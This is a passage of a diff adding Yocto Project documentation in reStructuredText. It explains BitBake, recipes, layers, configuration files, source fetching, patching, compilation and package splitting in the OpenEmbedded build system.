+overviews these components by describing their use and how they
+interact.
+
+BitBake handles the parsing and execution of the data files. The data
+itself is of various types:
+
+- *Recipes:* Provides details about particular pieces of software.
+
+- *Class Data:* Abstracts common build information (e.g. how to build a
+ Linux kernel).
+
+- *Configuration Data:* Defines machine-specific settings, policy
+ decisions, and so forth. Configuration data acts as the glue to bind
+ everything together.
+
+BitBake knows how to combine multiple data sources together and refers
+to each data source as a layer. For information on layers, see the
+":ref:`dev-manual/dev-manual-common-tasks:understanding and creating layers`"
+section of the Yocto Project Development Tasks Manual.
+
+Following are some brief details on these core components. For
+additional information on how these components interact during a build,
+see the
+":ref:`overview-manual/overview-manual-concepts:openembedded build system concepts`"
+section.
+
+.. _usingpoky-components-bitbake:
+
+BitBake
+-------
+
+BitBake is the tool at the heart of the :term:`OpenEmbedded Build System`
+and is responsible
+for parsing the :term:`Metadata`, generating
+a list of tasks from it, and then executing those tasks.
+
+This section briefly introduces BitBake. If you want more information on
+BitBake, see the :doc:`BitBake User Manual <bitbake:index>`.
+
+To see a list of the options BitBake supports, use either of the
+following commands:
+::
+
+ $ bitbake -h
+ $ bitbake --help
+
+The most common usage for BitBake is ``bitbake recipename``, where
+``recipename`` is the name of the recipe you want to build (referred
+to as the "target"). The target often equates to the first part of a
+recipe's filename (e.g. "foo" for a recipe named ``foo_1.3.0-r0.bb``).
+So, to process the ``matchbox-desktop_1.2.3.bb`` recipe file, you might
+type the following:
+::
+
+ $ bitbake matchbox-desktop
+
+Several different
+versions of ``matchbox-desktop`` might exist. BitBake chooses the one
+selected by the distribution configuration. You can get more details
+about how BitBake chooses between different target versions and
+providers in the
+":ref:`Preferences <bitbake:bb-bitbake-preferences>`" section
+of the BitBake User Manual.
+
+BitBake also tries to execute any dependent tasks first. So for example,
+before building ``matchbox-desktop``, BitBake would build a cross
+compiler and ``glibc`` if they had not already been built.
+
+A useful BitBake option to consider is the ``-k`` or ``--continue``
+option. This option instructs BitBake to try and continue processing the
+job as long as possible even after encountering an error. When an error
+occurs, the target that failed and those that depend on it cannot be
+remade. However, when you use this option other dependencies can still
+be processed.
+
+.. _overview-components-recipes:
+
+Recipes
+-------
+
+Files that have the ``.bb`` suffix are "recipes" files. In general, a
+recipe contains information about a single piece of software. This
+information includes the location from which to download the unaltered
+source, any source patches to be applied to that source (if needed),
+which special configuration options to apply, how to compile the source
+files, and how to package the compiled output.
+
+The term "package" is sometimes used to refer to recipes. However, since
+the word "package" is used for the packaged output from the OpenEmbedded
+build system (i.e. ``.ipk`` or ``.deb`` files), this document avoids
+using the term "package" when referring to recipes.
+
+.. _overview-components-classes:
+
+Classes
+-------
+
+Class files (``.bbclass``) contain information that is useful to share
+between recipes files. An example is the
+:ref:`autotools <ref-classes-autotools>` class,
+which contains common settings for any application that Autotools uses.
+The ":ref:`ref-manual/ref-classes:Classes`" chapter in the
+Yocto Project Reference Manual provides details about classes and how to
+use them.
+
+.. _overview-components-configurations:
+
+Configurations
+--------------
+
+The configuration files (``.conf``) define various configuration
+variables that govern the OpenEmbedded build process. These files fall
+into several areas that define machine configuration options,
+distribution configuration options, compiler tuning options, general
+common configuration options, and user configuration options in
+``conf/local.conf``, which is found in the :term:`Build Directory`.
+
+
+.. _overview-layers:
+
+Layers
+======
+
+Layers are repositories that contain related metadata (i.e. sets of
+instructions) that tell the OpenEmbedded build system how to build a
+target. Yocto Project's `layer model <#the-yocto-project-layer-model>`__
+facilitates collaboration, sharing, customization, and reuse within the
+Yocto Project development environment. Layers logically separate
+information for your project. For example, you can use a layer to hold
+all the configurations for a particular piece of hardware. Isolating
+hardware-specific configurations allows you to share other metadata by
+using a different layer where that metadata might be common across
+several pieces of hardware.
+
+Many layers exist that work in the Yocto Project development
+environment. The `Yocto Project Curated Layer
+Index <https://www.yoctoproject.org/software-overview/layers/>`__
+and `OpenEmbedded Layer
+Index <http://layers.openembedded.org/layerindex/branch/master/layers/>`__
+both contain layers from which you can use or leverage.
+
+By convention, layers in the Yocto Project follow a specific form.
+Conforming to a known structure allows BitBake to make assumptions
+during builds on where to find types of metadata. You can find
+procedures and learn about tools (i.e. ``bitbake-layers``) for creating
+layers suitable for the Yocto Project in the
+":ref:`dev-manual/dev-manual-common-tasks:understanding and creating layers`"
+section of the Yocto Project Development Tasks Manual.
+
+.. _openembedded-build-system-build-concepts:
+
+OpenEmbedded Build System Concepts
+==================================
+
+This section takes a more detailed look inside the build process used by
+the :term:`OpenEmbedded Build System`,
+which is the build
+system specific to the Yocto Project. At the heart of the build system
+is BitBake, the task executor.
+
+The following diagram represents the high-level workflow of a build. The
+remainder of this section expands on the fundamental input, output,
+process, and metadata logical blocks that make up the workflow.
+
+.. image:: figures/YP-flow-diagram.png
+ :align: center
+
+In general, the build's workflow consists of several functional areas:
+
+- *User Configuration:* metadata you can use to control the build
+ process.
+
+- *Metadata Layers:* Various layers that provide software, machine, and
+ distro metadata.
+
+- *Source Files:* Upstream releases, local projects, and SCMs.
+
+- *Build System:* Processes under the control of
+ :term:`BitBake`. This block expands
+ on how BitBake fetches source, applies patches, completes
+ compilation, analyzes output for package generation, creates and
+ tests packages, generates images, and generates cross-development
+ tools.
+
+- *Package Feeds:* Directories containing output packages (RPM, DEB or
+ IPK), which are subsequently used in the construction of an image or
+ Software Development Kit (SDK), produced by the build system. These
+ feeds can also be copied and shared using a web server or other means
+ to facilitate extending or updating existing images on devices at
+ runtime if runtime package management is enabled.
+
+- *Images:* Images produced by the workflow.
+
+- *Application Development SDK:* Cross-development tools that are
+ produced along with an image or separately with BitBake.
+
+User Configuration
+------------------
+
+User configuration helps define the build. Through user configuration,
+you can tell BitBake the target architecture for which you are building
+the image, where to store downloaded source, and other build properties.
+
+The following figure shows an expanded representation of the "User
+Configuration" box of the `general workflow
+figure <#general-workflow-figure>`__:
+
+.. image:: figures/user-configuration.png
+ :align: center
+
+BitBake needs some basic configuration files in order to complete a
+build. These files are ``*.conf`` files. The minimally necessary ones
+reside as example files in the ``build/conf`` directory of the
+:term:`Source Directory`. For simplicity,
+this section refers to the Source Directory as the "Poky Directory."
+
+When you clone the :term:`Poky` Git repository
+or you download and unpack a Yocto Project release, you can set up the
+Source Directory to be named anything you want. For this discussion, the
+cloned repository uses the default name ``poky``.
+
+.. note::
+
+ The Poky repository is primarily an aggregation of existing
+ repositories. It is not a canonical upstream source.
+
+The ``meta-poky`` layer inside Poky contains a ``conf`` directory that
+has example configuration files. These example files are used as a basis
+for creating actual configuration files when you source
+:ref:`structure-core-script`, which is the
+build environment script.
+
+Sourcing the build environment script creates a
+:term:`Build Directory` if one does not
+already exist. BitBake uses the Build Directory for all its work during
+builds. The Build Directory has a ``conf`` directory that contains
+default versions of your ``local.conf`` and ``bblayers.conf``
+configuration files. These default configuration files are created only
+if versions do not already exist in the Build Directory at the time you
+source the build environment setup script.
+
+Because the Poky repository is fundamentally an aggregation of existing
+repositories, some users might be familiar with running the
+:ref:`structure-core-script` script in the context of separate
+:term:`OpenEmbedded-Core (OE-Core)` and BitBake
+repositories rather than a single Poky repository. This discussion
+assumes the script is executed from within a cloned or unpacked version
+of Poky.
+
+Depending on where the script is sourced, different sub-scripts are
+called to set up the Build Directory (Yocto or OpenEmbedded).
+Specifically, the script ``scripts/oe-setup-builddir`` inside the poky
+directory sets up the Build Directory and seeds the directory (if
+necessary) with configuration files appropriate for the Yocto Project
+development environment.
+
+.. note::
+
+ The
+ scripts/oe-setup-builddir
+ script uses the
+ ``$TEMPLATECONF``
+ variable to determine which sample configuration files to locate.
+
+The ``local.conf`` file provides many basic variables that define a
+build environment. Here is a list of a few. To see the default
+configurations in a ``local.conf`` file created by the build environment
+script, see the
+:yocto_git:`local.conf.sample </cgit/cgit.cgi/poky/tree/meta-poky/conf/local.conf.sample>`
+in the ``meta-poky`` layer:
+
+- *Target Machine Selection:* Controlled by the
+ :term:`MACHINE` variable.
+
+- *Download Directory:* Controlled by the
+ :term:`DL_DIR` variable.
+
+- *Shared State Directory:* Controlled by the
+ :term:`SSTATE_DIR` variable.
+
+- *Build Output:* Controlled by the
+ :term:`TMPDIR` variable.
+
+- *Distribution Policy:* Controlled by the
+ :term:`DISTRO` variable.
+
+- *Packaging Format:* Controlled by the
+ :term:`PACKAGE_CLASSES`
+ variable.
+
+- *SDK Target Architecture:* Controlled by the
+ :term:`SDKMACHINE` variable.
+
+- *Extra Image Packages:* Controlled by the
+ :term:`EXTRA_IMAGE_FEATURES`
+ variable.
+
+.. note::
+
+ Configurations set in the
+ conf/local.conf
+ file can also be set in the
+ conf/site.conf
+ and
+ conf/auto.conf
+ configuration files.
+
+The ``bblayers.conf`` file tells BitBake what layers you want considered
+during the build. By default, the layers listed in this file include
+layers minimally needed by the build system. However, you must manually
+add any custom layers you have created. You can find more information on
+working with the ``bblayers.conf`` file in the
+":ref:`dev-manual/dev-manual-common-tasks:enabling your layer`"
+section in the Yocto Project Development Tasks Manual.
+
+The files ``site.conf`` and ``auto.conf`` are not created by the
+environment initialization script. If you want the ``site.conf`` file,
+you need to create that yourself. The ``auto.conf`` file is typically
+created by an autobuilder:
+
+- *site.conf:* You can use the ``conf/site.conf`` configuration
+ file to configure multiple build directories. For example, suppose
+ you had several build environments and they shared some common
+ features. You can set these default build properties here. A good
+ example is perhaps the packaging format to use through the
+ :term:`PACKAGE_CLASSES`
+ variable.
+
+ One useful scenario for using the ``conf/site.conf`` file is to
+ extend your :term:`BBPATH` variable
+ to include the path to a ``conf/site.conf``. Then, when BitBake looks
+ for Metadata using ``BBPATH``, it finds the ``conf/site.conf`` file
+ and applies your common configurations found in the file. To override
+ configurations in a particular build directory, alter the similar
+ configurations within that build directory's ``conf/local.conf``
+ file.
+
+- *auto.conf:* The file is usually created and written to by an
+ autobuilder. The settings put into the file are typically the same as
+ you would find in the ``conf/local.conf`` or the ``conf/site.conf``
+ files.
+
+You can edit all configuration files to further define any particular
+build environment. This process is represented by the "User
+Configuration Edits" box in the figure.
+
+When you launch your build with the ``bitbake target`` command, BitBake
+sorts out the configurations to ultimately define your build
+environment. It is important to understand that the
+:term:`OpenEmbedded Build System` reads the
+configuration files in a specific order: ``site.conf``, ``auto.conf``,
+and ``local.conf``. And, the build system applies the normal assignment
+statement rules as described in the
+":doc:`bitbake:bitbake-user-manual/bitbake-user-manual-metadata`" chapter
+of the BitBake User Manual. Because the files are parsed in a specific
+order, variable assignments for the same variable could be affected. For
+example, if the ``auto.conf`` file and the ``local.conf`` set variable1
+to different values, because the build system parses ``local.conf``
+after ``auto.conf``, variable1 is assigned the value from the
+``local.conf`` file.
+
+Metadata, Machine Configuration, and Policy Configuration
+---------------------------------------------------------
+
+The previous section described the user configurations that define
+BitBake's global behavior. This section takes a closer look at the
+layers the build system uses to further control the build. These layers
+provide Metadata for the software, machine, and policies.
+
+In general, three types of layer input exists. You can see them below
+the "User Configuration" box in the `general workflow
+figure <#general-workflow-figure>`__:
+
+- *Metadata (.bb + Patches):* Software layers containing
+ user-supplied recipe files, patches, and append files. A good example
+ of a software layer might be the
+ `meta-qt5 layer <https://github.com/meta-qt5/meta-qt5>`__ from
+ the `OpenEmbedded Layer
+ Index <http://layers.openembedded.org/layerindex/branch/master/layers/>`__.
+ This layer is for version 5.0 of the popular
+ `Qt <https://wiki.qt.io/About_Qt>`__ cross-platform application
+ development framework for desktop, embedded and mobile.
+
+- *Machine BSP Configuration:* Board Support Package (BSP) layers (i.e.
+ "BSP Layer" in the following figure) providing machine-specific
+ configurations. This type of information is specific to a particular
+ target architecture. A good example of a BSP layer from the `Poky
+ Reference Distribution <#gs-reference-distribution-poky>`__ is the
+ :yocto_git:`meta-yocto-bsp </cgit/cgit.cgi/poky/tree/meta-yocto-bsp>`
+ layer.
+
+- *Policy Configuration:* Distribution Layers (i.e. "Distro Layer" in
+ the following figure) providing top-level or general policies for the
+ images or SDKs being built for a particular distribution. For
+ example, in the Poky Reference Distribution the distro layer is the
+ :yocto_git:`meta-poky </cgit/cgit.cgi/poky/tree/meta-poky>`
+ layer. Within the distro layer is a ``conf/distro`` directory that
+ contains distro configuration files (e.g.
+ :yocto_git:`poky.conf </cgit/cgit.cgi/poky/tree/meta-poky/conf/distro/poky.conf>`
+ that contain many policy configurations for the Poky distribution.
+
+The following figure shows an expanded representation of these three
+layers from the `general workflow figure <#general-workflow-figure>`__:
+
+.. image:: figures/layer-input.png
+ :align: center
+
+In general, all layers have a similar structure. They all contain a
+licensing file (e.g. ``COPYING.MIT``) if the layer is to be distributed,
+a ``README`` file as good practice and especially if the layer is to be
+distributed, a configuration directory, and recipe directories. You can
+learn about the general structure for layers used with the Yocto Project
+in the
+":ref:`dev-manual/dev-manual-common-tasks:creating your own layer`"
+section in the
+Yocto Project Development Tasks Manual. For a general discussion on
+layers and the many layers from which you can draw, see the
+"`Layers <#overview-layers>`__" and "`The Yocto Project Layer
+Model <#the-yocto-project-layer-model>`__" sections both earlier in this
+manual.
+
+If you explored the previous links, you discovered some areas where many
+layers that work with the Yocto Project exist. The `Source
+Repositories <http://git.yoctoproject.org/>`__ also shows layers
+categorized under "Yocto Metadata Layers."
+
+.. note::
+
+ Layers exist in the Yocto Project Source Repositories that cannot be
+ found in the OpenEmbedded Layer Index. These layers are either
+ deprecated or experimental in nature.
+
+BitBake uses the ``conf/bblayers.conf`` file, which is part of the user
+configuration, to find what layers it should be using as part of the
+build.
+
+Distro Layer
+~~~~~~~~~~~~
+
+The distribution layer provides policy configurations for your
+distribution. Best practices dictate that you isolate these types of
+configurations into their own layer. Settings you provide in
+``conf/distro/distro.conf`` override similar settings that BitBake finds
+in your ``conf/local.conf`` file in the Build Directory.
+
+The following list provides some explanation and references for what you
+typically find in the distribution layer:
+
+- *classes:* Class files (``.bbclass``) hold common functionality that
+ can be shared among recipes in the distribution. When your recipes
+ inherit a class, they take on the settings and functions for that
+ class. You can read more about class files in the
+ ":ref:`ref-manual/ref-classes:Classes`" chapter of the Yocto
+ Reference Manual.
+
+- *conf:* This area holds configuration files for the layer
+ (``conf/layer.conf``), the distribution
+ (``conf/distro/distro.conf``), and any distribution-wide include
+ files.
+
+- *recipes-*:* Recipes and append files that affect common
+ functionality across the distribution. This area could include
+ recipes and append files to add distribution-specific configuration,
+ initialization scripts, custom image recipes, and so forth. Examples
+ of ``recipes-*`` directories are ``recipes-core`` and
+ ``recipes-extra``. Hierarchy and contents within a ``recipes-*``
+ directory can vary. Generally, these directories contain recipe files
+ (``*.bb``), recipe append files (``*.bbappend``), directories that
+ are distro-specific for configuration files, and so forth.
+
+BSP Layer
+~~~~~~~~~
+
+The BSP Layer provides machine configurations that target specific
+hardware. Everything in this layer is specific to the machine for which
+you are building the image or the SDK. A common structure or form is
+defined for BSP layers. You can learn more about this structure in the
+:doc:`../bsp-guide/bsp-guide`.
+
+.. note::
+
+ In order for a BSP layer to be considered compliant with the Yocto
+ Project, it must meet some structural requirements.
+
+The BSP Layer's configuration directory contains configuration files for
+the machine (``conf/machine/machine.conf``) and, of course, the layer
+(``conf/layer.conf``).
+
+The remainder of the layer is dedicated to specific recipes by function:
+``recipes-bsp``, ``recipes-core``, ``recipes-graphics``,
+``recipes-kernel``, and so forth. Metadata can exist for multiple
+formfactors, graphics support systems, and so forth.
+
+.. note::
+
+ While the figure shows several
+ recipes-\*
+ directories, not all these directories appear in all BSP layers.
+
+Software Layer
+~~~~~~~~~~~~~~
+
+The software layer provides the Metadata for additional software
+packages used during the build. This layer does not include Metadata
+that is specific to the distribution or the machine, which are found in
+their respective layers.
+
+This layer contains any recipes, append files, and patches, that your
+project needs.
+
+.. _sources-dev-environment:
+
+Sources
+-------
+
+In order for the OpenEmbedded build system to create an image or any
+target, it must be able to access source files. The `general workflow
+figure <#general-workflow-figure>`__ represents source files using the
+"Upstream Project Releases", "Local Projects", and "SCMs (optional)"
+boxes. The figure represents mirrors, which also play a role in locating
+source files, with the "Source Materials" box.
+
+The method by which source files are ultimately organized is a function
+of the project. For example, for released software, projects tend to use
+tarballs or other archived files that can capture the state of a release
+guaranteeing that it is statically represented. On the other hand, for a
+project that is more dynamic or experimental in nature, a project might
+keep source files in a repository controlled by a Source Control Manager
+(SCM) such as Git. Pulling source from a repository allows you to
+control the point in the repository (the revision) from which you want
+to build software. Finally, a combination of the two might exist, which
+would give the consumer a choice when deciding where to get source
+files.
+
+BitBake uses the :term:`SRC_URI`
+variable to point to source files regardless of their location. Each
+recipe must have a ``SRC_URI`` variable that points to the source.
+
+Another area that plays a significant role in where source files come
+from is pointed to by the
+:term:`DL_DIR` variable. This area is
+a cache that can hold previously downloaded source. You can also
+instruct the OpenEmbedded build system to create tarballs from Git
+repositories, which is not the default behavior, and store them in the
+``DL_DIR`` by using the
+:term:`BB_GENERATE_MIRROR_TARBALLS`
+variable.
+
+Judicious use of a ``DL_DIR`` directory can save the build system a trip
+across the Internet when looking for files. A good method for using a
+download directory is to have ``DL_DIR`` point to an area outside of
+your Build Directory. Doing so allows you to safely delete the Build
+Directory if needed without fear of removing any downloaded source file.
+
+The remainder of this section provides a deeper look into the source
+files and the mirrors. Here is a more detailed look at the source file
+area of the `general workflow figure <#general-workflow-figure>`__:
+
+.. image:: figures/source-input.png
+ :align: center
+
+Upstream Project Releases
+~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Upstream project releases exist anywhere in the form of an archived file
+(e.g. tarball or zip file). These files correspond to individual
+recipes. For example, the figure uses specific releases each for
+BusyBox, Qt, and Dbus. An archive file can be for any released product
+that can be built using a recipe.
+
+Local Projects
+~~~~~~~~~~~~~~
+
+Local projects are custom bits of software the user provides. These bits
+reside somewhere local to a project - perhaps a directory into which the
+user checks in items (e.g. a local directory containing a development
+source tree used by the group).
+
+The canonical method through which to include a local project is to use
+the :ref:`externalsrc <ref-classes-externalsrc>`
+class to include that local project. You use either the ``local.conf``
+or a recipe's append file to override or set the recipe to point to the
+local directory on your disk to pull in the whole source tree.
+
+.. _scms:
+
+Source Control Managers (Optional)
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Another place from which the build system can get source files is with
+:ref:`fetchers <bitbake:bb-fetchers>` employing various Source
+Control Managers (SCMs) such as Git or Subversion. In such cases, a
+repository is cloned or checked out. The
+:ref:`ref-tasks-fetch` task inside
+BitBake uses the :term:`SRC_URI`
+variable and the argument's prefix to determine the correct fetcher
+module.
+
+.. note::
+
+ For information on how to have the OpenEmbedded build system generate
+ tarballs for Git repositories and place them in the
+ DL_DIR
+ directory, see the :term:`BB_GENERATE_MIRROR_TARBALLS`
+ variable in the Yocto Project Reference Manual.
+
+When fetching a repository, BitBake uses the
+:term:`SRCREV` variable to determine
+the specific revision from which to build.
+
+Source Mirror(s)
+~~~~~~~~~~~~~~~~
+
+Two kinds of mirrors exist: pre-mirrors and regular mirrors. The
+:term:`PREMIRRORS` and
+:term:`MIRRORS` variables point to
+these, respectively. BitBake checks pre-mirrors before looking upstream
+for any source files. Pre-mirrors are appropriate when you have a shared
+directory that is not a directory defined by the
+:term:`DL_DIR` variable. A Pre-mirror
+typically points to a shared directory that is local to your
+organization.
+
+Regular mirrors can be any site across the Internet that is used as an
+alternative location for source code should the primary site not be
+functioning for some reason or another.
+
+.. _package-feeds-dev-environment:
+
+Package Feeds
+-------------
+
+When the OpenEmbedded build system generates an image or an SDK, it gets
+the packages from a package feed area located in the
+:term:`Build Directory`. The `general
+workflow figure <#general-workflow-figure>`__ shows this package feeds
+area in the upper-right corner.
+
+This section looks a little closer into the package feeds area used by
+the build system. Here is a more detailed look at the area:
+
+.. image:: figures/package-feeds.png
+ :align: center
+
+Package feeds are an intermediary step in the build process. The
+OpenEmbedded build system provides classes to generate different package
+types, and you specify which classes to enable through the
+:term:`PACKAGE_CLASSES`
+variable. Before placing the packages into package feeds, the build
+process validates them with generated output quality assurance checks
+through the :ref:`insane <ref-classes-insane>`
+class.
+
+The package feed area resides in the Build Directory. The directory the
+build system uses to temporarily store packages is determined by a
+combination of variables and the particular package manager in use. See
+the "Package Feeds" box in the illustration and note the information to
+the right of that area. In particular, the following defines where
+package files are kept:
+
+- :term:`DEPLOY_DIR`: Defined as
+ ``tmp/deploy`` in the Build Directory.
+
+- ``DEPLOY_DIR_*``: Depending on the package manager used, the package
+ type sub-folder. Given RPM, IPK, or DEB packaging and tarball
+ creation, the
+ :term:`DEPLOY_DIR_RPM`,
+ :term:`DEPLOY_DIR_IPK`,
+ :term:`DEPLOY_DIR_DEB`, or
+ :term:`DEPLOY_DIR_TAR`,
+ variables are used, respectively.
+
+- :term:`PACKAGE_ARCH`: Defines
+ architecture-specific sub-folders. For example, packages could exist
+ for the i586 or qemux86 architectures.
+
+BitBake uses the
+:ref:`do_package_write_* <ref-tasks-package_write_deb>`
+tasks to generate packages and place them into the package holding area
+(e.g. ``do_package_write_ipk`` for IPK packages). See the
+":ref:`ref-tasks-package_write_deb`",
+":ref:`ref-tasks-package_write_ipk`",
+":ref:`ref-tasks-package_write_rpm`",
+and
+":ref:`ref-tasks-package_write_tar`"
+sections in the Yocto Project Reference Manual for additional
+information. As an example, consider a scenario where an IPK packaging
+manager is being used and package architecture support for both i586 and
+qemux86 exist. Packages for the i586 architecture are placed in
+``build/tmp/deploy/ipk/i586``, while packages for the qemux86
+architecture are placed in ``build/tmp/deploy/ipk/qemux86``.
+
+.. _bitbake-dev-environment:
+
+BitBake Tool
+------------
+
+The OpenEmbedded build system uses
+:term:`BitBake` to produce images and
+Software Development Kits (SDKs). You can see from the `general workflow
+figure <#general-workflow-figure>`__, the BitBake area consists of
+several functional areas. This section takes a closer look at each of
+those areas.
+
+.. note::
+
+ Separate documentation exists for the BitBake tool. See the
+ BitBake User Manual
+ for reference material on BitBake.
+
+.. _source-fetching-dev-environment:
+
+Source Fetching
+~~~~~~~~~~~~~~~
+
+The first stages of building a recipe are to fetch and unpack the source
+code:
+
+.. image:: figures/source-fetching.png
+ :align: center
+
+The :ref:`ref-tasks-fetch` and
+:ref:`ref-tasks-unpack` tasks fetch
+the source files and unpack them into the
+:term:`Build Directory`.
+
+.. note::
+
+ For every local file (e.g.
+ file://
+ ) that is part of a recipe's
+ SRC_URI
+ statement, the OpenEmbedded build system takes a checksum of the file
+ for the recipe and inserts the checksum into the signature for the
+ do_fetch
+ task. If any local file has been modified, the
+ do_fetch
+ task and all tasks that depend on it are re-executed.
+
+By default, everything is accomplished in the Build Directory, which has
+a defined structure. For additional general information on the Build
+Directory, see the ":ref:`structure-core-build`" section in
+the Yocto Project Reference Manual.
+
+Each recipe has an area in the Build Directory where the unpacked source
+code resides. The :term:`S` variable points
+to this area for a recipe's unpacked source code. The name of that
+directory for any given recipe is defined from several different
+variables. The preceding figure and the following list describe the
+Build Directory's hierarchy:
+
+- :term:`TMPDIR`: The base directory
+ where the OpenEmbedded build system performs all its work during the
+ build. The default base directory is the ``tmp`` directory.
+
+- :term:`PACKAGE_ARCH`: The
+ architecture of the built package or packages. Depending on the
+ eventual destination of the package or packages (i.e. machine
+ architecture, :term:`Build Host`, SDK, or
+ specific machine), ``PACKAGE_ARCH`` varies. See the variable's
+ description for details.
+
+- :term:`TARGET_OS`: The operating
+ system of the target device. A typical value would be "linux" (e.g.
+ "qemux86-poky-linux").
+
+- :term:`PN`: The name of the recipe used
+ to build the package. This variable can have multiple meanings.
+ However, when used in the context of input files, ``PN`` represents
+ the name of the recipe.
+
+- :term:`WORKDIR`: The location
+ where the OpenEmbedded build system builds a recipe (i.e. does the
+ work to create the package).
+
+ - :term:`PV`: The version of the
+ recipe used to build the package.
+
+ - :term:`PR`: The revision of the
+ recipe used to build the package.
+
+- :term:`S`: Contains the unpacked source
+ files for a given recipe.
+
+ - :term:`BPN`: The name of the recipe
+ used to build the package. The ``BPN`` variable is a version of
+ the ``PN`` variable but with common prefixes and suffixes removed.
+
+ - :term:`PV`: The version of the
+ recipe used to build the package.
+
+.. note::
+
+ In the previous figure, notice that two sample hierarchies exist: one
+ based on package architecture (i.e.
+ PACKAGE_ARCH
+ ) and one based on a machine (i.e.
+ MACHINE
+ ). The underlying structures are identical. The differentiator being
+ what the OpenEmbedded build system is using as a build target (e.g.
+ general architecture, a build host, an SDK, or a specific machine).
+
+.. _patching-dev-environment:
+
+Patching
+~~~~~~~~
+
+Once source code is fetched and unpacked, BitBake locates patch files
+and applies them to the source files:
+
+.. image:: figures/patching.png
+ :align: center
+
+The :ref:`ref-tasks-patch` task uses a
+recipe's :term:`SRC_URI` statements
+and the :term:`FILESPATH` variable
+to locate applicable patch files.
+
+Default processing for patch files assumes the files have either
+``*.patch`` or ``*.diff`` file types. You can use ``SRC_URI`` parameters
+to change the way the build system recognizes patch files. See the
+:ref:`ref-tasks-patch` task for more
+information.
+
+BitBake finds and applies multiple patches for a single recipe in the
+order in which it locates the patches. The ``FILESPATH`` variable
+defines the default set of directories that the build system uses to
+search for patch files. Once found, patches are applied to the recipe's
+source files, which are located in the
+:term:`S` directory.
+
+For more information on how the source directories are created, see the
+"`Source Fetching <#source-fetching-dev-environment>`__" section. For
+more information on how to create patches and how the build system
+processes patches, see the
+":ref:`dev-manual/dev-manual-common-tasks:patching code`"
+section in the
+Yocto Project Development Tasks Manual. You can also see the
+":ref:`sdk-manual/sdk-extensible:use \`\`devtool modify\`\` to modify the source of an existing component`"
+section in the Yocto Project Application Development and the Extensible
+Software Development Kit (SDK) manual and the
+":ref:`kernel-dev/kernel-dev-common:using traditional kernel development to patch the kernel`"
+section in the Yocto Project Linux Kernel Development Manual.
+
+.. _configuration-compilation-and-staging-dev-environment:
+
+Configuration, Compilation, and Staging
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+After source code is patched, BitBake executes tasks that configure and
+compile the source code. Once compilation occurs, the files are copied
+to a holding area (staged) in preparation for packaging:
+
+.. image:: figures/configuration-compile-autoreconf.png
+ :align: center
+
+This step in the build process consists of the following tasks:
+
+- :ref:`ref-tasks-prepare_recipe_sysroot`:
+ This task sets up the two sysroots in
+ ``${``\ :term:`WORKDIR`\ ``}``
+ (i.e. ``recipe-sysroot`` and ``recipe-sysroot-native``) so that
+ during the packaging phase the sysroots can contain the contents of
+ the
+ :ref:`ref-tasks-populate_sysroot`
+ tasks of the recipes on which the recipe containing the tasks
+ depends. A sysroot exists for both the target and for the native
+ binaries, which run on the host system.
+
+- *do_configure*: This task configures the source by enabling and
+ disabling any build-time and configuration options for the software
+ being built. Configurations can come from the recipe itself as well
+ as from an inherited class. Additionally, the software itself might
+ configure itself depending on the target for which it is being built.
+
+ The configurations handled by the
+ :ref:`ref-tasks-configure` task
+ are specific to configurations for the source code being built by the
+ recipe.
+
+ If you are using the
+ :ref:`autotools <ref-classes-autotools>` class,
+ you can add additional configuration options by using the
+ :term:`EXTRA_OECONF` or
+ :term:`PACKAGECONFIG_CONFARGS`
+ variables. For information on how this variable works within that
+ class, see the
+ :ref:`autotools <ref-classes-autotools>` class
+ :yocto_git:`here </cgit/cgit.cgi/poky/tree/meta/classes/autotools.bbclass>`.
+
+- *do_compile*: Once a configuration task has been satisfied,
+ BitBake compiles the source using the
+ :ref:`ref-tasks-compile` task.
+ Compilation occurs in the directory pointed to by the
+ :term:`B` variable. Realize that the
+ ``B`` directory is, by default, the same as the
+ :term:`S` directory.
+
+- *do_install*: After compilation completes, BitBake executes the
+ :ref:`ref-tasks-install` task.
+ This task copies files from the ``B`` directory and places them in a
+ holding area pointed to by the :term:`D`
+ variable. Packaging occurs later using files from this holding
+ directory.
+
+.. _package-splitting-dev-environment:
+
+Package Splitting
+~~~~~~~~~~~~~~~~~
+
+After source code is configured, compiled, and staged, the build system
+analyzes the results and splits the output into packages:
+
+.. image:: figures/analysis-for-package-splitting.png
+ :align: center
+
+The :ref:`ref-tasks-package` and
+:ref:`ref-tasks-packagedata`
+tasks combine to analyze the files found in the
+:term:`D` directory and split them into
+subsets based on available packages and files. Analysis involves the
+following as well as other items: splitting out debugging symbols,
+looking at shared library dependencies between packages, and looking at
+package relationships.
+
+The ``do_packagedata`` task creates package metadata based on the
+analysis such that the build system can generate the final packages. The
+:ref:`ref-tasks-populate_sysroot`
+task stages (copies) a subset of the files installed by the
+:ref:`ref-tasks-install` task into
+the appropriate sysroot. Working, staged, and intermediate results of
+the analysis and package splitting process use several areas:
+
+- :term:`PKGD`: The destination
+ directory (i.e. ``package``) for packages before they are split into
+ individual packages.
+
+- :term:`PKGDESTWORK`: A
+ temporary work area (i.e. ``pkgdata``) used by the ``do_package``
+ task to save package metadata.
+
+- :term:`PKGDEST`: The parent
+ directory (i.e. ``packages-split``) for packages after they have been
+ split.
+
+- :term:`PKGDATA_DIR`: A shared,
+ global-state directory that holds packaging metadata generated during
+ the packaging process. The packaging process copies metadata from
+ ``PKGDESTWORK`` to the ``PKGDATA_DIR`` area where it becomes globally
+ available.
+
+- :term:`STAGING_DIR_HOST`:
+ The path for the sysroot for the system on which a component is built
+ to run (i.e. ``recipe-sysroot``).
+
+- :term:`STAGING_DIR_NATIVE`:
+ The path for the sysroot used when building components for the build
+ host (i.e. ``recipe-sysroot-native``).
+
+- :term:`STAGING_DIR_TARGET`:
+ The path for the sysroot used when a component that is built to
+ execute on a system and it generates code for yet another machine
+ (e.g. cross-canadian recipes).
+
+The :term:`FILES` variable defines the
+files that go into each package in
+:term:`PACKAGES`. If you want
+details on how this is accomplished, you can look at
+:yocto_git:`package.bbclass </cgit/cgit.cgi/poky/tree/meta/classes/package.bbclass>`.
+
+Depending on the type of packages being created (RPM, DEB, or IPK), the
+:ref:`do_package_write_* <ref-tasks-package_write_deb>`
+task creates the actual packages and places them in the Package Feed
+area, which is ``${TMPDIR}/deploy``. You can see the "`Package
+Feeds <#package-feeds-dev-environment>`__" section for more detail on
+that part of the build process.
+
+.. note::
+
+ Support for creating feeds directly from the
+ deploy/\*
